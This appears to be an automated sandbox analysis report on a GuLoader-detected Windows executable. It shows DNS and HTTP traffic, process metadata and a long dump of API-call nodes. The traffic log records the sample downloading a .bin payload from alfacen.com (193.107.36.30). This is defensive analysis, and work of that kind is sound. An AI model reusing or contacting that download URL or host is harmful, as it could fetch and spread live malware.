                                              Oct 20, 2024 17:50:29.222481012 CEST49839443192.168.2.4193.107.36.30
                                              Timestamp                             Source Port  Dest Port  Source IP    Dest IP
                                              Oct 20, 2024 17:50:26.804383993 CEST  49646        53         192.168.2.4  1.1.1.1
                                              Oct 20, 2024 17:50:26.926016092 CEST  53           49646      1.1.1.1      192.168.2.4

                                              Timestamp                             Source IP    Dest IP  Trans ID  OP Code             Name         Type            Class        DNS over HTTPS
                                              Oct 20, 2024 17:50:26.804383993 CEST  192.168.2.4  1.1.1.1  0xa694    Standard query (0)  alfacen.com  A (IP address)  IN (0x0001)  false

                                              Timestamp                             Source IP  Dest IP      Trans ID  Reply Code    Name         CName  Address        Type            Class        DNS over HTTPS
                                              Oct 20, 2024 17:50:26.926016092 CEST  1.1.1.1    192.168.2.4  0xa694    No error (0)  alfacen.com         193.107.36.30  A (IP address)  IN (0x0001)  false
                                              • alfacen.com
                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                              0           192.168.2.4  49839        193.107.36.30   443               7984  C:\Users\user\Desktop\3507071243740008011.exe
                                              Timestamp                Bytes transferred  Direction  Data
                                              2024-10-20 15:50:28 UTC  174                OUT        GET /jFhxxDhhDcCKVgiwlWM221.bin HTTP/1.1
                                                                                                     User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                     Host: alfacen.com
                                                                                                     Cache-Control: no-cache
                                              2024-10-20 15:50:28 UTC  344                IN         HTTP/1.1 200 OK
                                                                                                     Date: Sun, 20 Oct 2024 15:50:28 GMT
                                                                                                     Server: Apache
                                                                                                     Upgrade: h2,h2c
                                                                                                     Connection: Upgrade, close
                                                                                                     Last-Modified: Fri, 18 Oct 2024 13:09:53 GMT
                                                                                                     Accept-Ranges: bytes
                                                                                                     Content-Length: 289344
                                                                                                     Cache-Control: max-age=2592000
                                                                                                     Expires: Tue, 19 Nov 2024 15:50:28 GMT
                                                                                                     Vary: Accept-Encoding
                                                                                                     Content-Type: application/octet-stream


                                              Target ID:0
                                              Start time:11:48:58
                                              Start date:20/10/2024
                                              Path:C:\Users\user\Desktop\3507071243740008011.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\3507071243740008011.exe"
                                              Imagebase:0x400000
                                              File size:986'863 bytes
                                              MD5 hash:300FFB3FD65EB4A84A14802828F91E38
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2445417513.0000000005438000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:true

                                              Target ID:4
                                              Start time:11:50:17
                                              Start date:20/10/2024
                                              Path:C:\Users\user\Desktop\3507071243740008011.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\3507071243740008011.exe"
                                              Imagebase:0x400000
                                              File size:986'863 bytes
                                              MD5 hash:300FFB3FD65EB4A84A14802828F91E38
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                                Execution Graph

                                                Execution Coverage:22.7%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:19.6%
                                                Total number of Nodes:1542
                                                Total number of Limit Nodes:46
4271 4027f7 4269->4271 4272 402806 SetFilePointer 4271->4272 4272->4270 4273 402816 4272->4273 4275 4061c9 wsprintfW 4273->4275 4275->4270 5121 100018a9 5122 100018cc 5121->5122 5123 10001911 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5122->5123 5124 100018ff GlobalFree 5122->5124 5125 10001272 2 API calls 5123->5125 5124->5123 5126 10001a87 GlobalFree GlobalFree 5125->5126 5127 40166a 5128 402c37 17 API calls 5127->5128 5129 401670 5128->5129 5130 4065c5 2 API calls 5129->5130 5131 401676 5130->5131 5132 401ced 5133 402c15 17 API calls 5132->5133 5134 401cf3 IsWindow 5133->5134 5135 401a20 5134->5135 4459 40176f 4460 402c37 17 API calls 4459->4460 4461 401776 4460->4461 4462 401796 4461->4462 4463 40179e 4461->4463 4519 406282 lstrcpynW 4462->4519 4520 406282 lstrcpynW 4463->4520 4466 40179c 4470 406516 5 API calls 4466->4470 4467 4017a9 4468 405b53 3 API calls 4467->4468 4469 4017af lstrcatW 4468->4469 4469->4466 4487 4017bb 4470->4487 4471 4065c5 2 API calls 4471->4487 4472 4017f7 4473 405d4f 2 API calls 4472->4473 4473->4487 4475 4017cd CompareFileTime 4475->4487 4476 40188d 4478 4052e6 24 API calls 4476->4478 4477 401864 4481 4052e6 24 API calls 4477->4481 4488 401879 4477->4488 4480 401897 4478->4480 4479 406282 lstrcpynW 4479->4487 4499 4030fa 4480->4499 4481->4488 4484 4018be SetFileTime 4486 4018d0 CloseHandle 4484->4486 4485 4062a4 17 API calls 4485->4487 4486->4488 4489 4018e1 4486->4489 4487->4471 4487->4472 4487->4475 4487->4476 4487->4477 4487->4479 4487->4485 4498 405d74 GetFileAttributesW CreateFileW 4487->4498 4521 4058e4 4487->4521 4490 4018e6 4489->4490 4491 4018f9 4489->4491 4493 4062a4 17 API calls 4490->4493 4492 4062a4 17 API calls 4491->4492 4494 401901 4492->4494 4496 4018ee lstrcatW 4493->4496 4497 4058e4 MessageBoxIndirectW 4494->4497 4496->4494 4497->4488 4498->4487 4501 403113 4499->4501 4500 403141 4525 403315 4500->4525 4501->4500 4528 40332b SetFilePointer 4501->4528 4505 4032ae 4507 4032f0 4505->4507 4511 4032b2 4505->4511 
4506 40315e GetTickCount 4510 4018aa 4506->4510 4518 4031ad 4506->4518 4509 403315 ReadFile 4507->4509 4508 403315 ReadFile 4508->4518 4509->4510 4510->4484 4510->4486 4511->4510 4512 403315 ReadFile 4511->4512 4513 405e26 WriteFile 4511->4513 4512->4511 4513->4511 4514 403203 GetTickCount 4514->4518 4515 403228 MulDiv wsprintfW 4516 4052e6 24 API calls 4515->4516 4516->4518 4517 405e26 WriteFile 4517->4518 4518->4508 4518->4510 4518->4514 4518->4515 4518->4517 4519->4466 4520->4467 4522 4058f9 4521->4522 4523 405945 4522->4523 4524 40590d MessageBoxIndirectW 4522->4524 4523->4487 4524->4523 4526 405df7 ReadFile 4525->4526 4527 40314c 4526->4527 4527->4505 4527->4506 4527->4510 4528->4500 5136 402570 5137 402c37 17 API calls 5136->5137 5138 402577 5137->5138 5141 405d74 GetFileAttributesW CreateFileW 5138->5141 5140 402583 5141->5140 4529 401b71 4530 401bc2 4529->4530 4531 401b7e 4529->4531 4532 401bc7 4530->4532 4533 401bec GlobalAlloc 4530->4533 4534 401c07 4531->4534 4539 401b95 4531->4539 4543 4022f1 4532->4543 4550 406282 lstrcpynW 4532->4550 4536 4062a4 17 API calls 4533->4536 4535 4062a4 17 API calls 4534->4535 4534->4543 4538 4022eb 4535->4538 4536->4534 4542 4058e4 MessageBoxIndirectW 4538->4542 4548 406282 lstrcpynW 4539->4548 4540 401bd9 GlobalFree 4540->4543 4542->4543 4544 401ba4 4549 406282 lstrcpynW 4544->4549 4546 401bb3 4551 406282 lstrcpynW 4546->4551 4548->4544 4549->4546 4550->4540 4551->4543 5142 401a72 5143 402c15 17 API calls 5142->5143 5144 401a78 5143->5144 5145 402c15 17 API calls 5144->5145 5146 401a20 5145->5146 5147 4024f2 5148 402c77 17 API calls 5147->5148 5149 4024fc 5148->5149 5150 402c15 17 API calls 5149->5150 5151 402505 5150->5151 5152 402521 RegEnumKeyW 5151->5152 5153 40252d RegEnumValueW 5151->5153 5155 402885 5151->5155 5154 402542 RegCloseKey 5152->5154 5153->5154 5154->5155 4552 403373 SetErrorMode GetVersion 4553 4033b2 4552->4553 4554 4033b8 4552->4554 4555 40665c 5 API calls 4553->4555 4556 4065ec 3 API calls 4554->4556 
4555->4554 4557 4033ce lstrlenA 4556->4557 4557->4554 4558 4033de 4557->4558 4559 40665c 5 API calls 4558->4559 4560 4033e5 4559->4560 4561 40665c 5 API calls 4560->4561 4562 4033ec 4561->4562 4563 40665c 5 API calls 4562->4563 4564 4033f8 #17 OleInitialize SHGetFileInfoW 4563->4564 4643 406282 lstrcpynW 4564->4643 4567 403444 GetCommandLineW 4644 406282 lstrcpynW 4567->4644 4569 403456 GetModuleHandleW 4570 40346e 4569->4570 4571 405b80 CharNextW 4570->4571 4572 40347d CharNextW 4571->4572 4573 4035a7 GetTempPathW 4572->4573 4582 403496 4572->4582 4645 403342 4573->4645 4575 4035bf 4576 4035c3 GetWindowsDirectoryW lstrcatW 4575->4576 4577 403619 DeleteFileW 4575->4577 4578 403342 12 API calls 4576->4578 4655 402ec1 GetTickCount GetModuleFileNameW 4577->4655 4581 4035df 4578->4581 4579 405b80 CharNextW 4579->4582 4581->4577 4584 4035e3 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4581->4584 4582->4579 4588 403592 4582->4588 4590 403590 4582->4590 4583 40362d 4585 4036e0 4583->4585 4586 4036d0 4583->4586 4591 405b80 CharNextW 4583->4591 4589 403342 12 API calls 4584->4589 4742 4038b6 4585->4742 4683 403990 4586->4683 4739 406282 lstrcpynW 4588->4739 4595 403611 4589->4595 4590->4573 4607 40364c 4591->4607 4595->4577 4595->4585 4596 40381a 4599 403822 GetCurrentProcess OpenProcessToken 4596->4599 4600 40389e ExitProcess 4596->4600 4597 4036fa 4598 4058e4 MessageBoxIndirectW 4597->4598 4604 403708 ExitProcess 4598->4604 4605 40383a LookupPrivilegeValueW AdjustTokenPrivileges 4599->4605 4606 40386e 4599->4606 4602 403710 4609 40584f 5 API calls 4602->4609 4603 4036aa 4608 405c5b 18 API calls 4603->4608 4605->4606 4610 40665c 5 API calls 4606->4610 4607->4602 4607->4603 4612 4036b6 4608->4612 4613 403715 lstrcatW 4609->4613 4611 403875 4610->4611 4614 40388a ExitWindowsEx 4611->4614 4617 403897 4611->4617 4612->4585 4740 406282 lstrcpynW 4612->4740 4615 403731 lstrcatW lstrcmpiW 4613->4615 4616 403726 lstrcatW 4613->4616 4614->4600 4614->4617 
4615->4585 4619 40374d 4615->4619 4616->4615 4622 40140b 2 API calls 4617->4622 4620 403752 4619->4620 4621 403759 4619->4621 4624 4057b5 4 API calls 4620->4624 4625 405832 2 API calls 4621->4625 4622->4600 4623 4036c5 4741 406282 lstrcpynW 4623->4741 4627 403757 4624->4627 4628 40375e SetCurrentDirectoryW 4625->4628 4627->4628 4629 403779 4628->4629 4630 40376e 4628->4630 4750 406282 lstrcpynW 4629->4750 4749 406282 lstrcpynW 4630->4749 4633 4062a4 17 API calls 4634 4037b8 DeleteFileW 4633->4634 4635 4037c5 CopyFileW 4634->4635 4640 403787 4634->4640 4635->4640 4636 40380e 4638 406048 36 API calls 4636->4638 4637 406048 36 API calls 4637->4640 4638->4585 4639 4062a4 17 API calls 4639->4640 4640->4633 4640->4636 4640->4637 4640->4639 4641 405867 2 API calls 4640->4641 4642 4037f9 CloseHandle 4640->4642 4641->4640 4642->4640 4643->4567 4644->4569 4646 406516 5 API calls 4645->4646 4647 40334e 4646->4647 4648 403358 4647->4648 4649 405b53 3 API calls 4647->4649 4648->4575 4650 403360 4649->4650 4651 405832 2 API calls 4650->4651 4652 403366 4651->4652 4751 405da3 4652->4751 4755 405d74 GetFileAttributesW CreateFileW 4655->4755 4657 402f01 4676 402f11 4657->4676 4756 406282 lstrcpynW 4657->4756 4659 402f27 4660 405b9f 2 API calls 4659->4660 4661 402f2d 4660->4661 4757 406282 lstrcpynW 4661->4757 4663 402f38 GetFileSize 4664 403034 4663->4664 4682 402f4f 4663->4682 4758 402e5d 4664->4758 4666 40303d 4668 40306d GlobalAlloc 4666->4668 4666->4676 4770 40332b SetFilePointer 4666->4770 4667 403315 ReadFile 4667->4682 4769 40332b SetFilePointer 4668->4769 4671 4030a0 4673 402e5d 6 API calls 4671->4673 4672 403088 4675 4030fa 31 API calls 4672->4675 4673->4676 4674 403056 4677 403315 ReadFile 4674->4677 4680 403094 4675->4680 4676->4583 4679 403061 4677->4679 4678 402e5d 6 API calls 4678->4682 4679->4668 4679->4676 4680->4676 4680->4680 4681 4030d1 SetFilePointer 4680->4681 4681->4676 4682->4664 4682->4667 4682->4671 4682->4676 4682->4678 4684 40665c 5 API calls 4683->4684 
4685 4039a4 4684->4685 4686 4039aa 4685->4686 4687 4039bc 4685->4687 4779 4061c9 wsprintfW 4686->4779 4688 406150 3 API calls 4687->4688 4689 4039ec 4688->4689 4691 403a0b lstrcatW 4689->4691 4693 406150 3 API calls 4689->4693 4692 4039ba 4691->4692 4771 403c66 4692->4771 4693->4691 4696 405c5b 18 API calls 4697 403a3d 4696->4697 4698 403ad1 4697->4698 4700 406150 3 API calls 4697->4700 4699 405c5b 18 API calls 4698->4699 4701 403ad7 4699->4701 4702 403a6f 4700->4702 4703 403ae7 LoadImageW 4701->4703 4704 4062a4 17 API calls 4701->4704 4702->4698 4707 403a90 lstrlenW 4702->4707 4711 405b80 CharNextW 4702->4711 4705 403b8d 4703->4705 4706 403b0e RegisterClassW 4703->4706 4704->4703 4710 40140b 2 API calls 4705->4710 4708 403b44 SystemParametersInfoW CreateWindowExW 4706->4708 4709 403b97 4706->4709 4712 403ac4 4707->4712 4713 403a9e lstrcmpiW 4707->4713 4708->4705 4709->4585 4714 403b93 4710->4714 4716 403a8d 4711->4716 4715 405b53 3 API calls 4712->4715 4713->4712 4717 403aae GetFileAttributesW 4713->4717 4714->4709 4718 403c66 18 API calls 4714->4718 4719 403aca 4715->4719 4716->4707 4720 403aba 4717->4720 4721 403ba4 4718->4721 4780 406282 lstrcpynW 4719->4780 4720->4712 4723 405b9f 2 API calls 4720->4723 4724 403bb0 ShowWindow 4721->4724 4725 403c33 4721->4725 4723->4712 4727 4065ec 3 API calls 4724->4727 4781 4053b9 OleInitialize 4725->4781 4732 403bc8 4727->4732 4728 403c39 4729 403c55 4728->4729 4730 403c3d 4728->4730 4733 40140b 2 API calls 4729->4733 4730->4709 4737 40140b 2 API calls 4730->4737 4731 403bd6 GetClassInfoW 4735 403c00 DialogBoxParamW 4731->4735 4736 403bea GetClassInfoW RegisterClassW 4731->4736 4732->4731 4734 4065ec 3 API calls 4732->4734 4733->4709 4734->4731 4738 40140b 2 API calls 4735->4738 4736->4735 4737->4709 4738->4709 4739->4590 4740->4623 4741->4586 4743 4038c0 CloseHandle 4742->4743 4744 4038ce 4742->4744 4743->4744 4795 4038fb 4744->4795 4747 405990 67 API calls 4748 4036e9 OleUninitialize 4747->4748 4748->4596 4748->4597 
4749->4629 4750->4640 4752 405db0 GetTickCount GetTempFileNameW 4751->4752 4753 403371 4752->4753 4754 405de6 4752->4754 4753->4575 4754->4752 4754->4753 4755->4657 4756->4659 4757->4663 4759 402e66 4758->4759 4760 402e7e 4758->4760 4761 402e76 4759->4761 4762 402e6f DestroyWindow 4759->4762 4763 402e86 4760->4763 4764 402e8e GetTickCount 4760->4764 4761->4666 4762->4761 4765 406698 2 API calls 4763->4765 4766 402e9c CreateDialogParamW ShowWindow 4764->4766 4767 402ebf 4764->4767 4768 402e8c 4765->4768 4766->4767 4767->4666 4768->4666 4769->4672 4770->4674 4772 403c7a 4771->4772 4788 4061c9 wsprintfW 4772->4788 4774 403ceb 4789 403d1f 4774->4789 4776 403a1b 4776->4696 4777 403cf0 4777->4776 4778 4062a4 17 API calls 4777->4778 4778->4777 4779->4692 4780->4698 4792 404263 4781->4792 4783 4053dc 4786 405403 4783->4786 4787 401389 2 API calls 4783->4787 4784 404263 SendMessageW 4785 405415 OleUninitialize 4784->4785 4785->4728 4786->4784 4787->4783 4788->4774 4790 4062a4 17 API calls 4789->4790 4791 403d2d SetWindowTextW 4790->4791 4791->4777 4793 40427b 4792->4793 4794 40426c SendMessageW 4792->4794 4793->4783 4794->4793 4796 403909 4795->4796 4797 40390e FreeLibrary GlobalFree 4796->4797 4798 4038d3 4796->4798 4797->4797 4797->4798 4798->4747 5157 401573 5158 401583 ShowWindow 5157->5158 5159 40158c 5157->5159 5158->5159 5160 40159a ShowWindow 5159->5160 5161 402abf 5159->5161 5160->5161 5162 4014f5 SetForegroundWindow 5163 402abf 5162->5163 5164 100016b6 5165 100016e5 5164->5165 5166 10001b18 22 API calls 5165->5166 5167 100016ec 5166->5167 5168 100016f3 5167->5168 5169 100016ff 5167->5169 5172 10001272 2 API calls 5168->5172 5170 10001726 5169->5170 5171 10001709 5169->5171 5174 10001750 5170->5174 5175 1000172c 5170->5175 5173 1000153d 3 API calls 5171->5173 5176 100016fd 5172->5176 5177 1000170e 5173->5177 5179 1000153d 3 API calls 5174->5179 5178 100015b4 3 API calls 5175->5178 5180 100015b4 3 API calls 5177->5180 5181 10001731 5178->5181 5179->5176 5182 
10001714 5180->5182 5183 10001272 2 API calls 5181->5183 5184 10001272 2 API calls 5182->5184 5185 10001737 GlobalFree 5183->5185 5186 1000171a GlobalFree 5184->5186 5185->5176 5187 1000174b GlobalFree 5185->5187 5186->5176 5187->5176 5188 401e77 5189 402c37 17 API calls 5188->5189 5190 401e7d 5189->5190 5191 402c37 17 API calls 5190->5191 5192 401e86 5191->5192 5193 402c37 17 API calls 5192->5193 5194 401e8f 5193->5194 5195 402c37 17 API calls 5194->5195 5196 401e98 5195->5196 5197 401423 24 API calls 5196->5197 5198 401e9f 5197->5198 5205 4058aa ShellExecuteExW 5198->5205 5200 401ee1 5201 40670d 5 API calls 5200->5201 5203 402885 5200->5203 5202 401efb CloseHandle 5201->5202 5202->5203 5205->5200 5206 10002238 5207 10002296 5206->5207 5208 100022cc 5206->5208 5207->5208 5209 100022a8 GlobalAlloc 5207->5209 5209->5207 5210 40167b 5211 402c37 17 API calls 5210->5211 5212 401682 5211->5212 5213 402c37 17 API calls 5212->5213 5214 40168b 5213->5214 5215 402c37 17 API calls 5214->5215 5216 401694 MoveFileW 5215->5216 5217 4016a0 5216->5217 5218 4016a7 5216->5218 5219 401423 24 API calls 5217->5219 5220 4065c5 2 API calls 5218->5220 5222 40224a 5218->5222 5219->5222 5221 4016b6 5220->5221 5221->5222 5223 406048 36 API calls 5221->5223 5223->5217 5224 1000103d 5225 1000101b 5 API calls 5224->5225 5226 10001056 5225->5226 4844 40247e 4845 402c77 17 API calls 4844->4845 4846 402488 4845->4846 4847 402c37 17 API calls 4846->4847 4848 402491 4847->4848 4849 40249c RegQueryValueExW 4848->4849 4852 402885 4848->4852 4850 4024c2 RegCloseKey 4849->4850 4851 4024bc 4849->4851 4850->4852 4851->4850 4855 4061c9 wsprintfW 4851->4855 4855->4850 5227 4020fe 5228 402c37 17 API calls 5227->5228 5229 402105 5228->5229 5230 402c37 17 API calls 5229->5230 5231 40210f 5230->5231 5232 402c37 17 API calls 5231->5232 5233 402119 5232->5233 5234 402c37 17 API calls 5233->5234 5235 402123 5234->5235 5236 402c37 17 API calls 5235->5236 5237 40212d 5236->5237 5238 40216c CoCreateInstance 
5237->5238 5239 402c37 17 API calls 5237->5239 5242 40218b 5238->5242 5239->5238 5240 401423 24 API calls 5241 40224a 5240->5241 5242->5240 5242->5241 5243 4019ff 5244 402c37 17 API calls 5243->5244 5245 401a06 5244->5245 5246 402c37 17 API calls 5245->5246 5247 401a0f 5246->5247 5248 401a16 lstrcmpiW 5247->5248 5249 401a28 lstrcmpW 5247->5249 5250 401a1c 5248->5250 5249->5250 3807 401f00 3822 402c37 3807->3822 3816 401f2b 3818 401f30 3816->3818 3819 401f3b 3816->3819 3817 402885 3847 4061c9 wsprintfW 3818->3847 3821 401f39 CloseHandle 3819->3821 3821->3817 3823 402c43 3822->3823 3848 4062a4 3823->3848 3826 401f06 3828 4052e6 3826->3828 3829 405301 3828->3829 3837 401f10 3828->3837 3830 40531d lstrlenW 3829->3830 3833 4062a4 17 API calls 3829->3833 3831 405346 3830->3831 3832 40532b lstrlenW 3830->3832 3835 405359 3831->3835 3836 40534c SetWindowTextW 3831->3836 3834 40533d lstrcatW 3832->3834 3832->3837 3833->3830 3834->3831 3835->3837 3838 40535f SendMessageW SendMessageW SendMessageW 3835->3838 3836->3835 3839 405867 CreateProcessW 3837->3839 3838->3837 3840 401f16 3839->3840 3841 40589a CloseHandle 3839->3841 3840->3817 3840->3821 3842 40670d WaitForSingleObject 3840->3842 3841->3840 3843 406727 3842->3843 3844 406739 GetExitCodeProcess 3843->3844 3890 406698 3843->3890 3844->3816 3847->3821 3849 4062b1 3848->3849 3850 4064fc 3849->3850 3853 4064ca lstrlenW 3849->3853 3856 4062a4 10 API calls 3849->3856 3857 4063df GetSystemDirectoryW 3849->3857 3859 4063f2 GetWindowsDirectoryW 3849->3859 3860 406516 5 API calls 3849->3860 3861 40646d lstrcatW 3849->3861 3862 406426 SHGetSpecialFolderLocation 3849->3862 3863 4062a4 10 API calls 3849->3863 3874 406150 3849->3874 3879 4061c9 wsprintfW 3849->3879 3880 406282 lstrcpynW 3849->3880 3851 402c64 3850->3851 3881 406282 lstrcpynW 3850->3881 3851->3826 3865 406516 3851->3865 3853->3849 3856->3853 3857->3849 3859->3849 3860->3849 3861->3849 3862->3849 3864 40643e SHGetPathFromIDListW CoTaskMemFree 3862->3864 3863->3849 
3864->3849 3872 406523 3865->3872 3866 406599 3867 40659e CharPrevW 3866->3867 3869 4065bf 3866->3869 3867->3866 3868 40658c CharNextW 3868->3866 3868->3872 3869->3826 3871 406578 CharNextW 3871->3872 3872->3866 3872->3868 3872->3871 3873 406587 CharNextW 3872->3873 3886 405b80 3872->3886 3873->3868 3882 4060ef 3874->3882 3877 406184 RegQueryValueExW RegCloseKey 3878 4061b4 3877->3878 3878->3849 3879->3849 3880->3849 3881->3851 3883 4060fe 3882->3883 3884 406102 3883->3884 3885 406107 RegOpenKeyExW 3883->3885 3884->3877 3884->3878 3885->3884 3887 405b86 3886->3887 3888 405b9c 3887->3888 3889 405b8d CharNextW 3887->3889 3888->3872 3889->3887 3891 4066b5 PeekMessageW 3890->3891 3892 4066c5 WaitForSingleObject 3891->3892 3893 4066ab DispatchMessageW 3891->3893 3892->3843 3893->3891 5251 401000 5252 401037 BeginPaint GetClientRect 5251->5252 5253 40100c DefWindowProcW 5251->5253 5255 4010f3 5252->5255 5258 401179 5253->5258 5256 401073 CreateBrushIndirect FillRect DeleteObject 5255->5256 5257 4010fc 5255->5257 5256->5255 5259 401102 CreateFontIndirectW 5257->5259 5260 401167 EndPaint 5257->5260 5259->5260 5261 401112 6 API calls 5259->5261 5260->5258 5261->5260 4178 100027c2 4179 10002812 4178->4179 4180 100027d2 VirtualProtect 4178->4180 4180->4179 5262 401503 5263 40150b 5262->5263 5265 40151e 5262->5265 5264 402c15 17 API calls 5263->5264 5264->5265 4216 402306 4217 40230e 4216->4217 4220 402314 4216->4220 4218 402c37 17 API calls 4217->4218 4218->4220 4219 402322 4222 402330 4219->4222 4223 402c37 17 API calls 4219->4223 4220->4219 4221 402c37 17 API calls 4220->4221 4221->4219 4224 402c37 17 API calls 4222->4224 4223->4222 4225 402339 WritePrivateProfileStringW 4224->4225 5266 401f86 5267 402c37 17 API calls 5266->5267 5268 401f8d 5267->5268 5269 40665c 5 API calls 5268->5269 5270 401f9c 5269->5270 5271 401fb8 GlobalAlloc 5270->5271 5273 402020 5270->5273 5272 401fcc 5271->5272 5271->5273 5274 40665c 5 API calls 5272->5274 5275 401fd3 5274->5275 5276 40665c 5 API 
calls 5275->5276 5277 401fdd 5276->5277 5277->5273 5281 4061c9 wsprintfW 5277->5281 5279 402012 5282 4061c9 wsprintfW 5279->5282 5281->5279 5282->5273 4233 402388 4234 402390 4233->4234 4235 4023bb 4233->4235 4245 402c77 4234->4245 4237 402c37 17 API calls 4235->4237 4239 4023c2 4237->4239 4250 402cf5 4239->4250 4240 4023a1 4242 402c37 17 API calls 4240->4242 4243 4023a8 RegDeleteValueW RegCloseKey 4242->4243 4244 4023cf 4243->4244 4246 402c37 17 API calls 4245->4246 4247 402c8e 4246->4247 4248 4060ef RegOpenKeyExW 4247->4248 4249 402397 4248->4249 4249->4240 4249->4244 4251 402d0b 4250->4251 4252 402d21 4251->4252 4254 402d2a 4251->4254 4252->4244 4255 4060ef RegOpenKeyExW 4254->4255 4256 402d58 4255->4256 4257 402dd0 4256->4257 4258 402d5c 4256->4258 4257->4252 4259 402d7e RegEnumKeyW 4258->4259 4260 402d95 RegCloseKey 4258->4260 4261 402db6 RegCloseKey 4258->4261 4263 402d2a 6 API calls 4258->4263 4259->4258 4259->4260 4262 40665c 5 API calls 4260->4262 4261->4257 4264 402da5 4262->4264 4263->4258 4265 402dc4 RegDeleteKeyW 4264->4265 4266 402da9 4264->4266 4265->4257 4266->4257 5283 40190c 5284 401943 5283->5284 5285 402c37 17 API calls 5284->5285 5286 401948 5285->5286 5287 405990 67 API calls 5286->5287 5288 401951 5287->5288 5289 401d0e 5290 402c15 17 API calls 5289->5290 5291 401d15 5290->5291 5292 402c15 17 API calls 5291->5292 5293 401d21 GetDlgItem 5292->5293 5294 40258c 5293->5294 5295 1000164f 5296 10001516 GlobalFree 5295->5296 5298 10001667 5296->5298 5297 100016ad GlobalFree 5298->5297 5299 10001682 5298->5299 5300 10001699 VirtualFree 5298->5300 5299->5297 5300->5297 5301 40190f 5302 402c37 17 API calls 5301->5302 5303 401916 5302->5303 5304 4058e4 MessageBoxIndirectW 5303->5304 5305 40191f 5304->5305 5306 401491 5307 4052e6 24 API calls 5306->5307 5308 401498 5307->5308 5309 402592 5310 4025c1 5309->5310 5311 4025a6 5309->5311 5313 4025f5 5310->5313 5314 4025c6 5310->5314 5312 402c15 17 API calls 5311->5312 5320 4025ad 5312->5320 5316 402c37 17 API 
calls 5313->5316 5315 402c37 17 API calls 5314->5315 5317 4025cd WideCharToMultiByte lstrlenA 5315->5317 5318 4025fc lstrlenW 5316->5318 5317->5320 5318->5320 5319 402629 5321 405e26 WriteFile 5319->5321 5323 40263f 5319->5323 5320->5319 5322 405e55 5 API calls 5320->5322 5320->5323 5321->5323 5322->5319 5324 10001058 5326 10001074 5324->5326 5325 100010dd 5326->5325 5327 10001516 GlobalFree 5326->5327 5328 10001092 5326->5328 5327->5328 5329 10001516 GlobalFree 5328->5329 5330 100010a2 5329->5330 5331 100010b2 5330->5331 5332 100010a9 GlobalSize 5330->5332 5333 100010b6 GlobalAlloc 5331->5333 5334 100010c7 5331->5334 5332->5331 5335 1000153d 3 API calls 5333->5335 5336 100010d2 GlobalFree 5334->5336 5335->5334 5336->5325 5337 401c19 5338 402c15 17 API calls 5337->5338 5339 401c20 5338->5339 5340 402c15 17 API calls 5339->5340 5341 401c2d 5340->5341 5342 401c42 5341->5342 5343 402c37 17 API calls 5341->5343 5344 401c52 5342->5344 5347 402c37 17 API calls 5342->5347 5343->5342 5345 401ca9 5344->5345 5346 401c5d 5344->5346 5349 402c37 17 API calls 5345->5349 5348 402c15 17 API calls 5346->5348 5347->5344 5350 401c62 5348->5350 5351 401cae 5349->5351 5352 402c15 17 API calls 5350->5352 5353 402c37 17 API calls 5351->5353 5354 401c6e 5352->5354 5355 401cb7 FindWindowExW 5353->5355 5356 401c99 SendMessageW 5354->5356 5357 401c7b SendMessageTimeoutW 5354->5357 5358 401cd9 5355->5358 5356->5358 5357->5358 5359 402a9a SendMessageW 5360 402ab4 InvalidateRect 5359->5360 5361 402abf 5359->5361 5360->5361 5362 40281b 5363 402821 5362->5363 5364 402829 FindClose 5363->5364 5365 402abf 5363->5365 5364->5365 5366 40149e 5367 4022f1 5366->5367 5368 4014ac PostQuitMessage 5366->5368 5368->5367 5369 40469f 5370 4046d5 5369->5370 5371 4046af 5369->5371 5373 40427e 8 API calls 5370->5373 5372 404217 18 API calls 5371->5372 5374 4046bc SetDlgItemTextW 5372->5374 5375 4046e1 5373->5375 5374->5370 5376 100010e1 5377 10001111 5376->5377 5378 100011d8 GlobalFree 5377->5378 5379 100012ba 2 
API calls 5377->5379 5380 100011d3 5377->5380 5381 100011f8 GlobalFree 5377->5381 5382 10001272 2 API calls 5377->5382 5383 10001164 GlobalAlloc 5377->5383 5384 100012e1 lstrcpyW 5377->5384 5385 100011c4 GlobalFree 5377->5385 5379->5377 5380->5378 5381->5377 5382->5385 5383->5377 5384->5377 5385->5377 5386 4015a3 5387 402c37 17 API calls 5386->5387 5388 4015aa SetFileAttributesW 5387->5388 5389 4015bc 5388->5389 5390 405425 5391 405446 GetDlgItem GetDlgItem GetDlgItem 5390->5391 5392 4055cf 5390->5392 5435 40424c SendMessageW 5391->5435 5394 405600 5392->5394 5395 4055d8 GetDlgItem CreateThread CloseHandle 5392->5395 5396 40562b 5394->5396 5397 405650 5394->5397 5398 405617 ShowWindow ShowWindow 5394->5398 5395->5394 5401 405665 ShowWindow 5396->5401 5402 40563f 5396->5402 5405 40568b 5396->5405 5403 40427e 8 API calls 5397->5403 5437 40424c SendMessageW 5398->5437 5399 4054b6 5404 4054bd GetClientRect GetSystemMetrics SendMessageW SendMessageW 5399->5404 5409 405685 5401->5409 5410 405677 5401->5410 5407 4041f0 SendMessageW 5402->5407 5408 40565e 5403->5408 5411 40552b 5404->5411 5412 40550f SendMessageW SendMessageW 5404->5412 5405->5397 5406 405699 SendMessageW 5405->5406 5406->5408 5413 4056b2 CreatePopupMenu 5406->5413 5407->5397 5417 4041f0 SendMessageW 5409->5417 5416 4052e6 24 API calls 5410->5416 5414 405530 SendMessageW 5411->5414 5415 40553e 5411->5415 5412->5411 5418 4062a4 17 API calls 5413->5418 5414->5415 5419 404217 18 API calls 5415->5419 5416->5409 5417->5405 5420 4056c2 AppendMenuW 5418->5420 5421 40554e 5419->5421 5422 4056f2 TrackPopupMenu 5420->5422 5423 4056df GetWindowRect 5420->5423 5424 405557 